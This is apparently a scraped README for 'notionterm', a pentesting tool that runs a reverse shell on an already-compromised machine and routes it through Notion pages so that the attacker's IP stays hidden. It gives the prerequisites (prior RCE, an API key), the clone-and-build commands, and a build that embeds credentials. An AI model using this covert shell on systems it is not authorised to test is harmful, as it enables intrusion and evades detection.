- Hiding attacker IP in reverse shell (No direct interaction between attacker and target machine. Notion is used as a proxy hosting the reverse shell)
- Demo/Quick proof insertion within report
- High available and shareable reverse shell (desktop, browser, mobile)
- Encrypted and authenticated remote shell
- Long and interactive shell session (see tacos for that)
Why?The focus was on making something fun while still being usable, but that's not meant to be THE solution for reverse shell in the pentester's arsenal
How?Just use notion as usual and launch
- Notion software and API key
- Allowed HTTP communication from the target to the notion domain
- Prior RCE on target
roughly inspired by the great idea of OffensiveNotion and notionion!
- Create a page and give to the integration API key the permissions to have page write access
notiontermand transfer it on target machine (see install)
There are 3 main ways to run
Get terminal, stop/unstop it, etc...
Start the shell with the button widget: turn
ON, do you reverse shell stuff, turn
OFFto pause, turn
ONto resume etc...
Ease notionterm embedding in any page
notionterm --server [flags]
Start a shell session in any page by creating an embed block with URL containing the page id (
CTRL+Lto get it):
Only perform HTTP traffic from target → notion
notionterm light [flags]
notionterm is aimed to be run on target machine it must be built to fit with it.
Thus set env var to fit with the target requirement:
git clone https://github.com/ariary/notionterm.git && cd notiontermGOOS=$GOOS go build notionterm.go
You will need to set API key and notion page URL using either env var (
NOTION_PAGE_URL) or flags (
Embed directly the notion integration API token and notion page url in the binary.
everybody with access to the binary can retrieved the token. For security reason don't share it and remove it after use.
Set according env var:
export NOTION_PAGE_URL=[NOTION_PAGE_URL]export NOTION_TOKEN=[INTEGRATION_NOTION_TOKEN]
And build it:
git clone https://github.com/ariary/notionterm.git && cd notionterm./static-build.sh $NOTION_PAGE_URL $NOTION_TOKEN $GOOS go build notionterm.go